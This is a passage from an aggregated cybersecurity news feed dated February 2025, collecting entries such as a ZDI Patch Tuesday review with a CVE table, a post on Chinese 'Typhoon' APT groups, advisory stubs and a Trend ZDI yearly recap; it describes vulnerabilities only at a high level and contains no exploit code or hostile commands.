protect our users and customers.

https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat/
Microsoft patchetirsdag februar 2025
2025-02-11T19:59:38Z | 1739303978

Microsoft har offentliggjort sine månedlige sikkerhetsoppdateringer i kveld1. Det er 3 sårbarheter vurdert som kritiske av Microsoft. Disse sårbarhetene er gjennomgått i mer detaljer på Microsoft sine sider1.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/microsoft-patchetirsdag-februar-2025
The February 2025 Security Update Review
2025-02-11T19:08:38Z | 1739300918

We’ve survived Pwn2Own Automotive and made it to the second Patch Tuesday of 2025. As always, Microsoft and Adobe have released their latest security patches. Take a break from your scheduled activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here: Adobe Patches for February 2025For February, Adobe released seven bulletins addressing 45 CVEs in Adobe InDesign, Commerce, Substance 3D Stager, InCopy, Illustrator, Substance 3D Designer, and Adobe Photoshop Elements. The largest by far is the update for Commerce with 31 CVEs addressed. While there are some cross-site scripting (XSS) bugs addressed, there are also some security feature bypasses and Critical-rated code execution bugs, too. The update for InDesign fixes seven bugs, four of which are rated Critical. The three bugs in Illustrator are also rated Critical and could lead to arbitrary code execution when opening a malicious file.The patch for Substance 3D Stager fixes a single DoS bug. The fix for InCopy is also a single bug, but this one is a Critical-rated code execution. That’s the same case of the Substance 3D Designer patch. The final Adobe patch for February covers an Important-rated privilege escalation in Photoshop Elements.None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.Microsoft Patches for February 2025This month, Microsoft released 57 new CVEs in Windows and Windows Components, Office and Office Components, Azure, Visual Studio, and Remote Desktop Services. Two of these were submitted through the Trend ZDI program. With the addition of the third-party CVEs, the entire release tops out at 67 CVEs.Of the patches released today, four are rated Critical, 52 are rated Important, and one is rated Moderate in severity. After a couple of record-breaking releases, this volume of fixes is more in line with expectations. Let’s hope this trend, rather than monster releases, remains the norm for 2025.Two of these bugs are listed as publicly known, and two others are listed as under active attack at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the bugs currently being exploited: -  CVE-2025-21391 - Windows Storage Elevation of Privilege VulnerabilityThis is one of the bugs being exploited in the wild receiving a patch in this month’s release, and it’s a type of bug we haven’t seen exploited publicly. The vulnerability allows an attacker to delete targeted files. How does this lead to privilege escalation? My colleague Simon Zuckerbraun details the technique here. While we’ve seen similar issues in the past, this does appear to be the first time the technique has been exploited in the wild. It’s also likely paired with a code execution bug to completely take over a system. Test and deploy this quickly.-   CVE-2025-21418 - Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityThis is the other bug being actively exploited, but it’s a more traditional privilege escalation than the other one. In this case, an authenticated user would need to run a specially-crafted program that ends up executing code with SYSTEM privileges. That’s why these types of bugs are usually paired with a code execution bug to take over a system. Microsoft doesn’t provide any information on how widespread these attacks are, but regardless of how targeted the attacks may be, I would test and deploy these patches quickly.-   CVE-2025-21376 - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution VulnerabilityThis vulnerability allows a remote, unauthenticated attacker to run their code on an affected system simply by sending a maliciously crafted request to the target. Since there’s no user interaction involved, that makes this bug wormable between affected LDAP servers. Microsoft lists this as “Exploitation Likely”, so even though this may be unlikely, I would treat this as an impending exploitation. Test and deploy the patch quickly.-  CVE-2025-21387 - Microsoft Excel Remote Code Execution VulnerabilityThis is one of several Excel fixes where the Preview Pane is an attack vector, which is confusing as Microsoft also notes that user interaction is required. They also note that multiple patches are required to address this vulnerability fully. This likely can be exploited either by opening a malicious Excel file or previewing a malicious attachment in Outlook. Either way, make sure you get all the needed patches tested and deployed.Here’s the full list of CVEs released by Microsoft for February 2025: CVE Title Severity CVSS Public Exploited Type CVE-2025-21418 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Important 7.8 No Yes EoP CVE-2025-21391 Windows Storage Elevation of Privilege Vulnerability Important 7.1 No Yes EoP CVE-2025-21194 Microsoft Surface Security Feature Bypass Vulnerability Important 7.1 Yes No SFB CVE-2025-21377 NTLM Hash Disclosure Spoofing Vulnerability Important 6.5 Yes No Spoofing CVE-2025-21379 DHCP Client Service Remote Code Execution Vulnerability Critical 7.1 No No RCE CVE-2025-21177 Microsoft Dynamics 365 Sales Elevation of Privilege Vulnerability Critical 8.7 No No EoP CVE-2025-21376 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-21381 Microsoft Excel Remote Code Execution Vulnerability Critical 7.8 No No RCE CVE-2025-21188 Azure Network Watcher VM Extension Elevation of Privilege Vulnerability Important 6 No No EoP CVE-2025-21179 DHCP Client Service Denial of Service Vulnerability Important 4.8 No No DoS CVE-2023-32002 * HackerOne: CVE-2023-32002 Node.js `Module._load()` policy Remote Code Execution Vulnerability Important 9.8 No No RCE CVE-2025-21212 Internet Connection Sharing (ICS) Denial of Service Vulnerability Important 6.5 No No DoS CVE-2025-21216 Internet Connection Sharing (ICS) Denial of Service Vulnerability Important 6.5 No No DoS CVE-2025-21254 Internet Connection Sharing (ICS) Denial of Service Vulnerability Important 6.5 No No DoS CVE-2025-21352 Internet Connection Sharing (ICS) Denial of Service Vulnerability Important 6.5 No No DoS CVE-2025-21375 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24036 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-21368 Microsoft Digest Authentication Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21369 Microsoft Digest Authentication Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21279 * Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability Important 6.5 No No RCE CVE-2025-21283 * Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability Important 6.5 No No RCE CVE-2025-21342 * Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21408 * Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21383 Microsoft Excel Information Disclosure Vulnerability Important 7.8 No No Info CVE-2025-21386 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21387 † Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21390 † Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21394 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21198 Microsoft High Performance Compute (HPC) Pack Remote Code Execution Vulnerability Important 9 No No RCE CVE-2025-21181 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21392 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21397 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-21259 Microsoft Outlook Spoofing Vulnerability Important 5.3 No No Spoofing CVE-2025-21322 Microsoft PC Manager Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21400 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 8 No No RCE CVE-2025-24039 Visual Studio Code Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-24042 Visual Studio Code JS Debug Extension Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-21206 Visual Studio Installer Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-21351 Windows Active Directory Domain Services API Denial of Service Vulnerability Important 7.5 No No DoS CVE-2025-21184 Windows Core Messaging Elevation of Privileges Vulnerability Important 7 No No EoP CVE-2025-21358 Windows Core Messaging Elevation of Privileges Vulnerability Important 7.8 No No EoP CVE-2025-21414 Windows Core Messaging Elevation of Privileges Vulnerability Important 7 No No EoP CVE-2025-21347 Windows Deployment Services Denial of Service Vulnerability Important 6 No No DoS CVE-2025-21420 Windows Disk Cleanup Tool Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21373 Windows Installer Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21350 Windows Kerberos Denial of Service Vulnerability Important 5.9 No No DoS CVE-2025-21359 Windows Kernel Security Feature Bypass Vulnerability Important 7.8 No No SFB CVE-2025-21337 Windows NTFS Elevation of Privilege Vulnerability Important 3.3 No No EoP CVE-2025-21349 Windows Remote Desktop Configuration Service Tampering Vulnerability Important 6.8 No No Tampering CVE-2025-21182 Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability Important 7.4 No No EoP CVE-2025-21183 Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability Important 7.4 No No EoP CVE-2025-21208 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21410 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21419 Windows Setup Files Cleanup Elevation of Privilege Vulnerability Important 7.1 No No EoP CVE-2025-21201 Windows Telephony Server Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21190 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21200 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21371 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21406 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21407 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-21367 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21253 Microsoft Edge for IOS and Android Spoofing Vulnerability Moderate 5.3 No No Spoofing CVE-2025-21267 * Microsoft Edge (Chromium-based) Spoofing Vulnerability Low 4.4 No No Spoofing CVE-2025-21404 * Microsoft Edge (Chromium-based) Spoofing Vulnerability Low 4.3 No No Spoofing CVE-2025-0444 * Chromium: CVE-2025-0444 Use after free in Skia High N/A No No RCE CVE-2025-0445 * Chromium: CVE-2025-0445 Use after free in V8 High N/A No No RCE CVE-2025-0451 * Chromium: CVE-2025-0451 Inappropriate implementation in Extensions API Medium N/A No No RCE * Indicates this CVE had been released by a third party and is now being included in Microsoft releases.† Indicates further administrative actions are required to fully address the vulnerability.Moving on to the other Critical-rated bugs, there’s a code execution bug in the DHCP server, but it can only be accessed by Adjacent attackers. It also requires a machine-in-the-middle (MITM) exploit, so this bug is definitely unlikely to be exploited in the wild. The other Critical-rated bug is in Microsoft Dynamics 365 and has already been addressed by Microsoft, so there’s no action here.Looking at the other code execution bugs, many patches impact Excel and other Office components. Many of the Excel bugs have the Preview Pane as an attack vector as well, but again, Microsoft notes that user interaction is required. Some of these updates require multiple patches, so please pay attention when you’re deploying updates. The bug in SharePoint does require special privileges, but anyone who can create a site in SharePoint has the appropriate privileges. Two bugs in Digest Authentication can be hit remotely, but they do require authentication. The Telephony Service and Routing and Remote Access Service (RRAS) have several fixes, but none of these are likely to be exploited. The final RCE bug is in the High Performance Compute (HPC) Pack that could allow attackers the ability to perform RCE on other clusters or nodes connected to the targeted head node. HPC Clusters are often complex, but there’s just a single patch to test and deploy here.There are a handful of privilege escalation bugs receiving fixes in this month’s release, and most of these either lead to SYSTEM-level code execution or administrative privileges if an authenticated user runs specially crafted code. One of these was reported by Trend ZDI’s Simon Zuckerbraun. CVE-2025-21373 is a link-following bug. Though the “msiserver” service is protected by the Redirection Guard mitigation, the mitigation can be bypassed if the attacker can mount an NTFS-formatted removable drive such as a USB drive. In this case, a low-privileged user can use this vulnerability to escalate privileges and execute code as SYSTEM.There are some exceptions to this style of privilege escalation bugs. The vulnerability Windows Setup Files could allow a file deletion, similar to the bug being actively exploited. The bug in NTFS could list folder contents, but it’s not clear how this could lead to an escalation. The bug in AutoUpdate is only in the macOS version and leads to root permissions. Microsoft doesn’t provide details about the bug in Azure Network Watcher other than to say an attack would need Contributor or Owner permissions. Finally, the bugs in Visual Studio would allow an attacker to gain the rights of the user running the affected application. There are two security feature bypass (SFB) bugs included in this release, and the bug in Microsoft Surface is listed as publicly known. This could allow an attacker to avoid UEFI protections, but there are a mountain of caveats to exploitation. The bug in the kernel is interesting from a policy perspective. The vulnerability allows an attacker to bypass the user access control (UAC) prompt. Microsoft used to not fix bugs of this nature as they claimed UAC was not a security boundary – therefore, UAC bypasses weren’t a security bug. With this fix, Microsoft quietly announces it has changed its mind about this policy.There’s only one information disclosure bug this month, and that’s for Excel. It only results in info leaks consisting of unspecified memory contents. There’s also a single Tampering bug in Remote Desktop, but Microsoft doesn’t say what is being tampered with. They do note it requires a MITM attack.There are nine different Denial-of-Service (DoS) bugs getting fixed this month, and as usual, details are sparse. The bugs in the DHCP server and Internet Connection Sharing (ICS) service require a network adjacent attacker. Others require attackers to send specially crafted messages to the target. However, the bug in Windows Deployment Services is different. To begin with, it’s a local bug and requires authentication. The attacker could overwrite file contents and cause the service to be unavailable.Finally, there are three spoofing bugs fixed in the release. The first is a publicly known bug in NTLM. As expected, NTLM spoofing means relaying an NTLMv2 hash. The spoofing bug in Outlook impacts your Junk folder and could make it appear as though the sender is someone else. Microsoft provides no information about the bug in Edge for iOS and Android. If you’re one of the dozens out there using Edge on iOS or Android, go to your respective app store and download the updates.No new advisories are being released this month.Looking AheadThe next Patch Tuesday of 2025 will be on March 11, and I’ll return with my analysis and thoughts about the release. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

https://www.thezdi.com/blog/2025/2/11/the-february-2025-security-update-review
A Guide to SBOM Requirements Around the Globe
2025-02-11T19:01:12Z | 1739300472

Over the past several years, regulators around the globe have begun issuing Software Bill of Materials (SBOM) requirements and standards in an effort to strengthen software security. SBOMs are a detailed inventory of all the components—open source, proprietary, and third-party—used in a software application. SBOMs provide visibility into software components and are a valuable tool […] The post A Guide to SBOM Requirements Around the Globe appeared first on RunSafe Security.

https://runsafesecurity.com/blog/sbom-requirements-global-guide/
The Rise of Typhoon Cyber Groups
2025-02-11T14:49:06Z | 1739285346

Threats to Critical Infrastructure and the Role of Infrastructure Intelligence While cybersecurity has generally been top-of-mind, and many reports outline both increasing attacks and increasingly complexity of attacks,  among the most concerning adversaries are the Typhoon cyber groups, a collection of advanced persistent threat (APT) actors attributed to China. These groups, including Salt Typhoon and others, have demonstrated a growing capability to target and compromise critical infrastructure on a global scale. Understanding how they operate, the tactics they use, and how infrastructure intelligence can help defend against their attacks is crucial for national security, organizational protection, and economic stability. The Growing Threat of Typhoon Cyber Groups Typhoon cyber groups are expanding their reach and sophistication, conducting cyber espionage and disruptive attacks across industries such as telecommunications, energy, finance, and government institutions. Their targets are often high-value entities where a single breach can have widespread consequences. Salt, Silk, Volt, Nylon, and Others --- these groups leverage advanced techniques such as supply chain compromises, exploiting zero-day vulnerabilities, and using legitimate administrative tools to blend in with normal network activity. One of the most notable groups, Salt Typhoon, has been linked to a series of high-profile breaches. Their focus on telecommunications providers has allowed them to intercept vast amounts of metadata and, in some cases, even gain access to audio recordings of phone calls. These attacks indicate an intent to surveil key individuals, disrupt national security, and undermine trust in critical communication networks.   Attacking Critical Infrastructure The most alarming aspect of Typhoon cyber groups is their focus on critical infrastructure. These attacks can have devastating consequences, from power grid failures and communication blackouts to financial market disruptions and national security breaches. Some of the key sectors targeted include: Telecommunications: Typhoon groups have infiltrated telecom networks to monitor communications, extract sensitive data, and potentially disrupt services. Energy and Utilities: Attacks on energy providers can cripple electricity distribution, water supply systems, and oil and gas pipelines, leading to economic instability and safety risks. Financial Systems: By targeting banks, stock exchanges, and payment processors, these groups can disrupt economic activities, manipulate transactions, and conduct financial espionage. Government and Defense: Espionage efforts have targeted military and government institutions, potentially compromising classified information and national security strategies. The convergence of cyber and physical threats highlights the need for proactive defense measures, as a single cyberattack could cascade into real-world disruptions that affect millions.   The Role of Infrastructure Intelligence in Cyber Defense To counter the growing threat of Typhoon cyber groups, infrastructure intelligence has emerged as a critical required capability. By understanding their use of infrastructure, organizations can detect threats early, track adversary techniques and tactics, and proactively defend against attacks. Detecting Attacks Early Infrastructure intelligence enables security teams to monitor network activity for signs of compromise. By monitoring outbound DNS traffic, seeing the unusual destination requests, and anomalous behaviors, and organizations can identify potential intrusions before they escalate, even from new endpoints like IoT devices. Understanding Command-and-Control (C2) Operations Typhoon groups rely on command-and-control (C2) infrastructure to coordinate their attacks, exfiltrate data, and deploy malware. Infrastructure intelligence helps shine a light on these C2 domains and related infrastructure, allowing security teams to disrupt adversary communications and neutralize threats before they cause significant damage. Proactive Protection Measures Traditional cybersecurity approaches often focus on reactive responses, but infrastructure intelligence shifts the paradigm to proactive defense and overall resiliency, allowing organizations to harden themselves against emerging threats, reducing the likelihood of a successful attack.   Strengthening Cyber Resilience The growing capabilities of Typhoon cyber groups underscore the urgent need for comprehensive cybersecurity strategies. Governments and organizations must prioritize investments in infrastructure intelligence, strengthen cross-sector collaboration, and adopt a proactive mindset in defending against cyber threats. It’s exactly for this reason that HYAS has focused on being the expert in infrastructure intelligence and related indicators of compromise (IOCs).  The power of HYAS and our unique visibility into “VRA” or Verdicts, Related Infrastructure, and Actor Attribution & Information, provides organizations worldwide not just with an ability to get proactive in ways that they just can’t without but provides key intelligence for their overall security approach.  As one vCISO said of HYAS, “I have a ton of tools. But none of them do what HYAS does. You are the glue that connects all other intel tools.”   Conclusion Typhoon cyber groups represent a persistent and evolving threat to global security. Their focus on critical infrastructure, combined with their sophisticated attack methodologies, makes them formidable adversaries. However, by leveraging infrastructure intelligence, understanding their tactics, and taking proactive measures, organizations can enhance their cyber resilience and protect vital systems from devastating attacks. The future of cybersecurity depends on staying ahead of these threats through continuous innovation, collaboration, and vigilance.

https://www.hyas.com/blog/the-rise-of-typhoon-cyber-groups
Arming the Defenders: A SOTI Report for Those Who Protect the Enterprise
2025-02-11T14:00:00Z | 1739282400

Defenders, this one is for you. Read this SOTI report to get actionable insights from cybersecurity experts who battle cyberthreats every day.

https://www.akamai.com/blog/security-research/2025/feb/arming-defenders-soti-report-for-protecting-enterprises
GigaOm and Frost & Sullivan Recognize Cato Networks for SASE Innovation
2025-02-11T13:27:00Z | 1739280420

The latest recognition of Cato Networks in the 2025 GigaOm Radar Report for Secure Access Service Edge (SASE) is just the newest example of our continued excellence in secure networking. Cato was named a Leader and Outperformer for a second consecutive year.   Recently, Cato has been recognized for its innovation and leadership in AI-driven... The post GigaOm and Frost & Sullivan Recognize Cato Networks for SASE Innovation appeared first on Cato Networks.

https://www.catonetworks.com/blog/gigaom-and-frost-sullivan-recognize-catos-sase-innovation/
Cato Networks Named a Leader and an Outperformer in the 2025 GigaOm Radar Report for SASE
2025-02-11T13:25:00Z | 1739280300

The post Cato Networks Named a Leader and an Outperformer in the 2025 GigaOm Radar Report for SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-named-leader-and-outperformer-in-gigaom-2025-sase-radar/
Exploring a VPN Appliance: A Researcher?s Journey
2025-02-11T13:00:00Z | 1739278800

https://www.akamai.com/blog/security-research/2025/feb/2025-february-fortinet-critical-vulnerabilities
Dragos Industrial Ransomware Analysis: Q4 2024
2025-02-11T13:00:00Z | 1739278800

In the fourth quarter (October to December) of 2024, the ransomware threat landscape presented an increasingly dynamic ecosystem, with multiple... The post Dragos Industrial Ransomware Analysis: Q4 2024  first appeared on Dragos.

https://www.dragos.com/blog/dragos-industrial-ransomware-analysis-q4-2024/
Financial support provided by the National Coordination Centre improved the cybersecurity of companies
2025-02-11T12:16:57Z | 1739276217

In the period 2023–2024, the National Coordination Centre of Traficom’s Finnish Cyber Security Centre granted a total of approximately EUR 2 million in financial support to micro-enterprises and SMEs for the implementation of state-of-the-art information and cyber security solutions and innovations. According to an assessment of the impacts of the financial support prepared by 4Front Oy, the support had significant impacts on the cyber security of the financial support recipients. In addition, the financial support can be expected to have a positive impact on national cyber security capacity, for example through the financial support recipients’ customer relationships and supply chains.

https://www.kyberturvallisuuskeskus.fi/en/news/financial-support-provided-national-coordination-centre-improved-cybersecurity-companies
Financial support provided by the National Coordination Centre improved the cybersecurity of companies
2025-02-11T12:16:57Z | 1739276217

In the period 2023–2024, the National Coordination Centre of Traficom’s Finnish Cyber Security Centre granted a total of approximately EUR 2 million in financial support to micro-enterprises and SMEs for the implementation of state-of-the-art information and cyber security solutions and innovations. According to an assessment of the impacts of the financial support prepared by 4Front Oy, the support had significant impacts on the cyber security of the financial support recipients. In addition, the financial support can be expected to have a positive impact on national cyber security capacity, for example through the financial support recipients’ customer relationships and supply chains.

https://www.kyberturvallisuuskeskus.fi/en/news/financial-support-provided-national-coordination-centre-improved-cybersecurity-companies
CVE-2024-47256
2025-02-11T11:00:00Z | 1739271600

CWE-321 USE OF HARD-CODED CRYPTOGRAPHIC KEY: In 2N Access Commander Versions 1.14 and prior, an attacker, who needs to have administrative access privileges, can read hardcoded AES passphrases, which may be used for decryption of certain data within backup files of 2N Access Commander Version 1.14 and older. 2N advises updating to Access Commander Version 3.3

https://claroty.com/team82/disclosure-dashboard/cve-2024-47256
How AI-driven identity fraud is causing havoc
2025-02-11T10:00:00Z | 1739268000

Deepfake fraud, synthetic identities, and AI-powered scams make identity theft harder to detect and prevent – here's how to fight back

https://www.welivesecurity.com/en/cybersecurity/ai-driven-identify-fraud-havoc/
Bug or Feature? The “Backdoor” in CONTEC CMS8000 Patient Monitor
2025-02-11T07:02:08Z | 1739257328

CISA issued an advisory on the CONTEC CMS8000 patient monitor, identifying a potential backdoor that connects to a hardcoded Chinese IP address for patient data transmission and firmware updates. CISA warns that this could enable remote code execution and device modification, posing patient safety risks if vital sign data is altered. However, Claroty argues that […] The post Bug or Feature? The “Backdoor” in CONTEC CMS8000 Patient Monitor appeared first on Radiflow.

https://www.radiflow.com/blog/bug-or-feature-the-backdoor-in-contec-cms8000-patient-monitor/
Evil Crow RF: A Portable Radio Frequency Device
2025-02-11T06:52:34Z | 1739256754

As mobile hackers, we often find that our smartphones, while powerful in many ways, lack the essential radio frequency (RF) features needed for wireless security testing. These limitations can be frustrating when trying to explore wireless signals directly from our mobile devices. However, with the Evil Crow RF V2, these limitations can be easily overcome. […] The post Evil Crow RF: A Portable Radio Frequency Device first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/02/11/evil-crow-rf-a-portable-radio-frequency-device/
Security Alert (A25-02-08): Vulnerability in Apple iOS and iPadOS
2025-02-11T04:00:00Z | 1739246400

Apple has released iOS 18.3.1, iPadOS 17.7.5 and iPadOS 18.3.1 to fix the vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
NVIDIA nvJPEG2000 Default Coding Styles Ndecomp buffer overflow vulnerability
2025-02-11T00:00:00Z | 1739232000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2113
NVIDIA nvJPEG2000 Ndecomp heap-based buffer overflow vulnerability
2025-02-11T00:00:00Z | 1739232000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2108
NVIDIA nvJPEG2000 cSIZ out-of-bounds write vulnerability
2025-02-11T00:00:00Z | 1739232000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2080
NVIDIA nvJPEG2000 Coding Style Component index out-of-bounds write vulnerability
2025-02-11T00:00:00Z | 1739232000

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2095
Linux Detection Engineering - Approaching the Summit on Persistence Mechanisms
2025-02-11T00:00:00Z | 1739232000

Building on foundational concepts and techniques explored in the previous publications, this post discusses some creative and/or complex persistence mechanisms.

https://www.elastic.co/security-labs/approaching-the-summit-on-persistence
New Exploitation Surge: Attackers Target ThinkPHP and ownCloud Flaws at Scale
2025-02-11T00:00:00Z | 1739232000

GreyNoise has detected a surge in exploitation attempts for two vulnerabilities—one flagged as a top target by government agencies and another flying under the radar despite real-world attacks. See the latest exploitation trends and why real-time intelligence is essential for risk management.

https://www.greynoise.io/blog/new-exploitation-surge-attackers-target-thinkphp-and-owncloud-flaws-at-scale
NIS2 Barometer Report
2025-02-10T21:01:17Z | 1739221277

Discover everything you need to know about the NIS2 regulation and its impact on your organization. This comprehensive report outlines key requirements, defines who is impacted, and shares insights from an in-depth study analyzing organizations' readiness for this regulation.

https://blog.riskrecon.com/resources/reports-and-whitepapers/nis2-barometer-report
Leveraging Microsoft Text Services Framework (TSF) for Red Team Operations
2025-02-10T17:04:16Z | 1739207056

The Praetorian Labs team was tasked with identifying novel and previously undocumented persistence mechanisms for use in red team engagements. Our primary focus was on persistence techniques achievable through modifications in HKCU, allowing for stealthy, user-level persistence without requiring administrative privileges. Unfortunately, while we identified an interesting persistence technique, the method we discuss in this […] The post Leveraging Microsoft Text Services Framework (TSF) for Red Team Operations appeared first on Praetorian.

https://www.praetorian.com/blog/leveraging-microsoft-text-services-framework-tsf-for-red-team-operations/
Neil Lawrence: What makes us unique in the age of AI | Starmus highlights
2025-02-10T10:00:00Z | 1739181600

As AI advances at a rapid clip, reshaping industries, automating tasks, and redefining what machines can achieve, one question looms large: what remains uniquely human?

https://www.welivesecurity.com/en/we-live-science/neil-lawrence-what-makes-us-unique-age-ai-starmus-highlights/
Expanding DLP & Endpoint Protection with Ransomware Recovery
2025-02-07T20:09:42Z | 1738958982

Ransomware attacks are rising, crippling businesses within minutes. To stay resilient, organizations must go beyond traditional security. A global provider, serving 40,000+ corporate clients and 3 million users, specializes in spam protection, mobile security, and privacy solutions. The post Expanding DLP & Endpoint Protection with Ransomware Recovery appeared first on Data443.

https://data443.com/expanding-dlp-and-endpoint-protection-with-ransomware-recovery/
Looking Back at the Trend ZDI Activities from 2024
2025-02-07T17:11:04Z | 1738948264

It’s a new year, but before we look forward to breaking all of our resolutions, let’s pause to take a look at the year that was for Trend Zero Day Initiative™ (ZDI).Pwn2Own Competitions Keep Exceeding ExpectationsEven though we just completed Pwn2Own Automotive 2025, we would be remiss if we didn’t mention the inaugural edition that occurred in January 2024. That contest brought together some of the best automotive researchers around the globe to the biggest (literally) Pwn2Own stage in history. The event garnered more participation than expected, as we awarded a record-setting amount of $1,323,750 for the discovery of 49 unique zero-day vulnerabilities across the three days of competition. From there, we moved on to Vancouver, where Manfred Paul wowed us all by hacking Chrome, Edge, Firefox, and Safari on his way to winning Master of Pwn. That event awarded $1,132,500 for 29 unique 0-days and also saw the first Docker escape at a Pwn2Own event. We ended by moving to Ireland and our Cork offices. This contest also saw the end of remote participation and required all contestants to be onsite. Over the four days of the contest, we awarded $1,066,625 for over 70 0-day vulnerabilities. That means Pwn2Own awarded over $3,500,000 in 2024 for 148 unique 0-days. Figure 1 - Ken Gannon exploiting the Samsung Galaxy S24 at Pwn2Own Ireland By the NumbersIn 2024, Trend ZDI published 1,741 advisories, which is down slightly from last year’s record high of 1,913 (more on that in a bit). While not a record-setting year, we’re just fine with that total. We don’t need to set a new mark every year – it’s just not sustainable. And while we do work with some of the best researchers from around the globe, our own researchers had a great year, too. Just over 40% of all published advisories were reported by Trend ZDI security researchers. Here’s how those numbers of advisories stack up year-over-year.  Figure 2 - Published advisories over the lifetime of the program Coordinated disclosure of vulnerabilities continues to be a priority for our program, and it continues to be a success as well. While 2020 saw our largest percentage of 0-day disclosures, the number declined over the next two years. However, while this number grew in 2023, it was down slightly in 2024. It decreased from 10.2% of disclosures to 9.7% - so not too much of a change at all. Figure 3 - 0-day disclosures per year Here’s a breakdown of advisories by vendor. While the top vendor (AutoDesk) may surprise you, we’ve worked with them extensively this year to improve their products. They’ve actually been a great partner to work with. The number two vendor, Delta Electronics, should also indicate to you the state of ICS/SCADA security, which we believe is still not up to par with their enterprise counterparts. This also marks the first year that we reported more Apple bugs than Adobe bugs, but something tells me that the trend won’t continue in 2025. Speaking of Adobe, PDF parsing remains a security challenge for vendors beyond just Acrobat and Reader. Foxit, Kofax/Tungsten Automation, and PDF-XChange all had a significant number of file parsing bugs reported by Trend ZDI. Figure 4 - Vendor distribution of published advisories in 2024 Of course, we’re always looking to acquire impactful bugs, and here’s an interesting comparison from 2023. Even though we published fewer bugs in 2024, we disclosed more Critical and High severity bugs in 2024 than we did in 2023. We put quality over quantity. Figure 5 - CVSS distribution of published advisories in 2024 Here’s how that compares to previous years: Figure 6 - Distribution of CVSS scores from 2015-2024 When it comes to the types of bugs we’re buying, here’s a look at the top 10 Common Weakness Enumerations (CWEs) from 2024: Figure 7 - Top CWEs of published advisories in 2024 It’s a bit disconcerting to see so many “simple” bugs, such as stack overflows and SQL injections, still account for so many bugs. Let’s hope that changes in 2025.Looking AheadMoving into the new year, we anticipate staying just as busy. We just completed Pwn2Own Automotive 2025 and have a special announcement about our next Pwn2Own contest coming up soon. Don’t worry if you can’t attend in person. We’ll be streaming and posting videos of the event to just about every brand of social media available. We also have more than 350 cases waiting to be patched, and our incoming queue is overflowing as we’re still catching up.We’re also looking to update our website and blog at some point this year. I know – I said that last year as well, but this time, I mean it. When that occurs, I promise I’ll do everything possible to ensure you will be able to choose between a light and dark theme. We’re also hoping to expand our video offerings, and I’ll continue offering the Patch Report on Patch Tuesdays and hope to tweak the format a bit in the coming year. As always, we look forward to refining our outreach and acquisition efforts by further aligning with the risks our customers are facing to ensure the bugs we squash have the biggest impact on our customers and the broader ecosystem. In other words, 2025 is shaping up to be another exciting year with impactful research, great contests, and real information you can use. We hope you come along for the ride. Until then, be well, stay tuned to this blog, subscribe to our YouTube channel, and follow us on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

https://www.thezdi.com/blog/2025/2/7/looking-back-at-the-trend-zdi-activities-from-2024
Climate investments that help businesses – as well as the planet
2025-02-07T13:00:00Z | 1738933200

